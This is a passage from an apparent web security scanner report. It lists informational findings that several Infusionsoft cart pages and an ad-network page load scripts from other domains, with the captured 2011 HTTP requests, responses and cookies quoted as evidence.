User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=wMdN3IA4Gj6r2JeEG2Scom1vMTqPvhqCchn_dwIVK3bAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIEbneS3P1jt3L2TU8DfXrAaO93Hmpqold0I45kSWFpZUdBpGxWFEALHWvTD43XAH-IISjk4v2YhwfWhYQtvWgYgVdA-aRZXmNDP7lSI2wQSGymRCuiX3msEf9Zx7_6oXdHFf3tE5HaJy7RuA2Rf6LYdaupG0mP-ALWuA6T1v3SoZ6tsowBc5pDAMyPtooX8bZ-yYLZMG4wQKFopdYuz1yBkr0NceN6dcXfCMb4qxb1ERCcJYAYD6EJQRZIEqwxwbz_yU6FIdm7osa-pnXnLvWEHNvHc1u2FfaaVBP8uYfPQfuUSZnolg2Mpi0PobZmvQDOteZNpUmAWLLBJZU75gkasQQ0XtSgyP9-pRtjKBA9Cwz2-4R9q34tPG7_LuWX_-aNjw1q3jr96MmE73EdnErm31cGBaFvfPGmIk78ZSjniU14SZgXhN6QRQnmxfn_Dr0Sj37arSozuBgqeZjp8etrKTdm0m9YtM5QtSe1bVf3R9YKqMVJJLJFDSB1wQojnNFLul7Qf_CirYJ-2QPYzq4yhsN0iuvZzF2TN72AdplWiGw8ZmyZijY6_JnGie9hFbVWeVYVArdJUjqkVsoRhZx5NsDf_Pg2Vk_EWg-3dTD9pFTjLDlon4jl8OOYYJTu_NA2U7H715d1gC9l-sZbJovak0GkbFYUQAsda9MPjdcAf4rBmUpt5y4rpKeABCF5QVHZV0D5pFleY0M_uVIjbBBIb9xT-csezj6lwXj_Nmdt2seLQXpLB6S1HBINAWF7E-PHgGmzu9XVcy87K21WiFWA7eN32Cn9-yoSfhGoimhWR97JgtkwbjBAoWil1i7PXIGRwNeiC56J41DeOs0h4Jdxf3U9yID4iMwKKBdWV0IWb4TfoQpcwAkPV_qYEXL4IsHf7dumssffcgoAlY6D2cXtVQQ0XtSgyP9-pRtjKBA9CwyrXT4Jtn4VTomBGSvjPUlhjw1q3jr96MmE73EdnErm3uasuleILtl5vfSa5So8yJ9SNrmRJCF3Pym6bROG15rEJXP1NEAEZrQLuU5tQYJdPZM1f6dELuAO8KtDRpqB5gmeMi1_n57x6YbK1sWcZupAhILP-pxiHcDJ1yFRsxk-TpsurtJYm25B4wm31tw5WHUD1RI5tHbziFyffCyec3xGAUJ346hmYbpDuUQ4oKjAiuL-2hbuln5AhIPfoFUF_EOHEnUDigVg1M2ynf_Wev9WX3kdiLElhX_nAiyZmBTfdm-XlB5QoWysyF-Y7Hf1MZXBheiAjiFf5UzegIuH4PUQO-ze74swfA11CtF02V_39E9eoWE0gjO__pRMYYCNos0id5u8voWars0ao_qpATqNv_nBNy4ucZg6Y4GMkS-Uy8QQogP__eeWKX_QyF6ZbfYlb808DY-4xpXvlG467_nOUxOanVNnn4gjMy4MXX_SYFgsT-Nyw6KA-UjtAzGx3ST26t-B9xRBN7mU2hlplarkFg1XBpthQ9HeAKEBf7kLSFRszfmYYe7Uvism5tsd-daY69ooDGZ3MpHXJdraprT7FOexOskvdKO4Nn35_FhBwTIvlSRAKdhdfTf_oLe9lSCovVmdibgj-eMxLBiVi9XaDpNlPu8OR8iP58nJcBcTfVBGx3ns03mUvCZAJm2YFEhr_SLCdfj6RZeVGuJjlpic4ukWbG8MrCkW6W1TNM51xyxUVFhCvn0Tsd2NN9Zg8CyVNSFbYT5i7EXUVsdX8VTpF6b_wTUKzPif6s4UsPRj5Xq329VWKuLUk8yR2TvuJlbPnSCsBMPzFM2TT622lUby3hrchtrkdVv94MMYvLFr_QqjhVA8noDmAMG3mRsWKcAWLEnchZRjNygyTywHm2OJOtAGVx_Q0nNelONr6KGG7VcX71eFucJce-UVDjth4kBZtDZf5aNFW5vne7J0GifHJC9Q26Zmd945oWbNmUqXPynv7-EjJb1GgH4fe1ui1I38Lrlk2aw4cliTmTdJH5kbLRf7BMVwcZSGDzwm2Qf_W4QVN6Lw-cKLO8HW5YV58k9EmBovamd8o5wXzBFcJNgrTgOkCvP7Ms3Fd5TPD_21_ejEQEJbqeXQUkzlYFcpDfg3SVkp2FuVxIrMGA3hfolqzE6cYcSZIw5Uge7dI3IPUCqdnj0RzdD__y88TuHkXTWbqfXJR9tgKEcSYsF5AX81Jta6gkfeXbpfsrmLzagraPNlNQ7J9TajAB7jF_keXq7ipPVd-EbmqZHsO7WXJvyIS0LUxtihMHYGwWwPA1JQL2IPKnquMNSJ2dSU9GU0v6gIXPR87vyMdp2dqCEd60B_1OnYdcYkjhrAnU-9dGVkZrkW95fREPDVij03vj6W4YsDRmROKtAdqTEo6ecRSen_KPX3qjSxDK7eb-eT6Hy4rJW1Y4ARYPqBC-WuBQ54IPnkbgv_bB-Nmf2BwkRnorhiE47RUKLg2hVWexVlrcySxjLiP3S7m3-9MWoRkGSwVlp3hdA59kr-DRGiUI8UincYYJ-MDe6abpHIdnYqv2T4X; fc=UvO6miSA7srWaSUFmeMCcpUTZjrhTTWDDAvcQFQBnA_cpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBNf-jvyPTWZaxMWGxN7lkboTgByV_ewuIYjgH3E0_oqobAomfI1NdN8_rfrRwVG6-YVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=0O0Evp5LqFqqor_WKvU5V8b90v2rJtW6tPaq4hh8j0wIHKIn0aMUCJnjty0nF6sdNC5UW7w2j6p7Ica3tqyPtLMm4306x4iI_gVgxycj0XjB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:23:34 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=7n0jLc6wfhYtN4UC_xZHjDE8GknzFh8Yypyq6cE5VZLAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIH--7-v9iqta9cngGoURkxMGcnA7v8jRH4b4sl7n9PZN5e7OhQFxHPJ-RJdl3G607nR8xTSPvK-p126IlPZnORzVdA-aRZXmNDP7lSI2wQSG55QP38_1fR9TckYAsb5pqNucRLlW4qnXZ7CXUVHWv4ip4RnopZye3I2VeDNhcjONP3-03B9JybbDQvPN0b-ukCyYLZMG4wQKFopdYuz1yBk6uornER4wRmSESJpiu82ECcJYAYD6EJQRZIEqwxwbz_lEmZ6JYNjKYtD6G2Zr0AzhTeXLgOjd5mCNMGZRMvzlPAi0-ygCjElB_D6jIRDFHIIScgwH8T5VpAgEj7tO6HQQQ0XtSgyP9-pRtjKBA9Cw7ifk0uxOjACIFVeNuv3Kptjw1q3jr96MmE73EdnErm3EO2R2jzxNQwIDSsUseWLhslLQZMoibX_53_H1iN9tYSj37arSozuBgqeZjp8etrKSH2BCJVCBKtPUgj7zhVaUIKqMVJJLJFDSB1wQojnNFKx04J3oj7OMPjzQdK5UfC2Jq2FR28g6N4ppYAe8Ruw3nqjVEnayD5Ik9CHgcwVvzn1LVARRZp3iAtwxIPfX4lcsDf_Pg2Vk_EWg-3dTD9pFenpFYpar7IAWiFrHeXfQIHuPt4ZMkfGTNUtC_PYTNHvl7s6FAXEc8n5El2XcbrTueV1rSiLZsaR5sVWtdVotFRV0D5pFleY0M_uVIjbBBIbVCiLiBpBUs_aknr5mSZhhuLQXpLB6S1HBINAWF7E-PF0vobXYP71SE5qK-q8G4NqDlZT0T_GBbo0bdYkYrIM6bJgtkwbjBAoWil1i7PXIGQAPq2-xg2GU0iNwzc4oGYf3U9yID4iMwKKBdWV0IWb4UHV201d3HZkauFg6OLUDww3Jco1_R6UO1xvstgmxd5oQQ0XtSgyP9-pRtjKBA9Cw-GbtMuSaHyCQtilVO0TY35jw1q3jr96MmE73EdnErm3sXSWj33G2Id3fM0m0Vv4l0jli_TYoFivdNz7W5XnWhDyphPg-RvEIoKBsFf6hjJvz2j2Qwj8cAVDSdBqW8BsrEqZy6Y983pwwSDKSbe2RC_kQoqJU_QjMpvwA6B8XQ75PSe6v1RpmK4AsjvGkw2msw7A-ILjAFqpx2M97C_Qtz6J-BEk0gCmyMGiyl2orSTXJgj3PYUSQksso83I27-VpIdXcEj3ATIHZ85bzjN59N1DesUH20WtmvEB85BGPQpVkX1adMEtSrGVs2U2coDfuajCpNlzAU3BFA2FUt1sY_z7JOCOD7od2p9Te_znzPLbFA49dyv4IOKemp9vkrTaHkid5u8voWars0ao_qpATqMTOTrNaZNANkBQjTexPCSafTSgpU4WHI3o7mz1yzeVtYE8N214FgBQDqQ4AvNfADBxNFi6SzWBu_A0Bbz1DMFVPSwfzkEF_z-gmdBqR5XUS_M3WvwMyoFdwzhFXPWWQAksB_srXEX4XpRKl9JBbxfxCG0ws7RKdslrrWG9FSHPfhOol8x7GcPW7kOnjSxzWjOywl4MuvfIipJ5uQ86jruUqv-BIgls5GMzhMPeQwyEEFAsLCSkxSCrw_Ka5doSqf2n0-lzpZDW3GxkM5Vc5hSjx5E4ajxLy24vZakjmlK7hBJK_lYL5YT6meUEDXaDLlth6GMsF-ZOXLRkCIiZdG4M_0HrCDKWrOFAi-3C0FAmBHnxfGYbg8COr02CVA34ezeHr4kD4IlHa-MMtxzuRfpv6ZVy5tUFP8vHhPZZkAmMM57eIbw_tY4C8HwmvvlhVGv8f4oOlu-Y0H6CqCbpQlF3v4slE2NCoocDEbMh7cDYOl_pU1S1DLzGiyxwGcuqgclX7IX5kFw94Ao9YPRny-RliH0i_LnkGLCdmk4MHDY7cSGOzokR-Oj8vP_2TSIYVN-8eQQ9O4KBYCVz0qItajtxmAshwxhbdMwe6MleT6PyVNqDXQwOLOIY2xu6P46AVksb7XdGynWyfHWytc_1lQPjrr750zRIZosJx9vG-GX2NHM7sKXJ37jo8-Jo4l8ddCZ0vbPY7NuPCkRfUJhuE9AG4r1_YBTH-5c5XvIOWMQKl-cdIC2fZhQepvvG5ZZZnAWHUIL1Guk7LM91kn-aJkpfOMQrt0lXDDGNIVD1SIh95bnm5A1FODwtLmHFCk4l3u4YUf8ReOuAPhbr9Nk34bCLmfH7Nl8tw2WqHUUkZ98JnJB6oWA0COW-xJeoEq79QtrOIBhaDR4tImYyfQddC6mxEIQGL9aux0Wy38Bq74ivwwUQ60dTkdFij10MJiUa9kl48TEunCtFLndtCy8eree7J9IekinTGw43yVJN00xxmSO3Zgc6iCsG01x0Dd27QFsrbn5uOBEJpIq5XcXboltYJTZc5dzQZbKS7KFurg7MY4t3auAill3FqTv4t7sCFOwxvjx_ZcdII-FGoXPlGQ-BM8eHGmxiK1X6esaML5Acc_Llvj5X9yLN7-Yc2YS4k_EO88xj88xPI03nF5WXwZ25; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Set-Cookie: fc=sVaQWGK_c_yr5nji4YJUfcbLxG6Rjky-ZVHROMXM-1E4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhYlRW_MKDTtf-sBpmbpaidAFDzQrUnrBcELT8jzJBt9GgVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Set-Cookie: pf=VrozooDcByghq55gga6oN_Blt_n-BRpYF3beF1itT8sIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRNS2adKbTT6osPmdQ8QvGT_B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:23:34 GMT
Content-Length: 10874


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
FmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3905.turn.com/B5269631.6;abr=!ie;sz=160x600;ord=4362734341326432640?;click=http://r.turn.com/r/tpclick/id/gOkoyMSLizwQrQcA9wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.37. https://cam.infusionsoft.com/cart/process  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /cart/process

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cart/process?packageCode=standard&affiliate=0 HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Referer: http://www.infusionsoft.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C137FB5113EEA15E639C83767C422E04; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 33219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...
</script>
<script type="text/javascript" src="https://api-secure.recaptcha.net/challenge?k=6LfPpboSAAAAAKIQsiPSXenzp30yQCjZM5j3UUPo&error=null"></script>
...[SNIP]...

24.38. https://cam.infusionsoft.com/cart/purchase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /cart/purchase

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cart/purchase HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; JSESSIONID=A4215DE137CDBD905410D00F870D2667; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FE830B0B251F8F6E90E35B3648DF48C8; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 8145
Date: Mon, 25 Apr 2011 01:46:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...
</script>
<script type="text/javascript" src="https://api-secure.recaptcha.net/challenge?k=6LfPpboSAAAAAKIQsiPSXenzp30yQCjZM5j3UUPo&error=null"></script>
...[SNIP]...

24.39. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:28:58 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Date: Sun, 24 Apr 2011 15:27:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
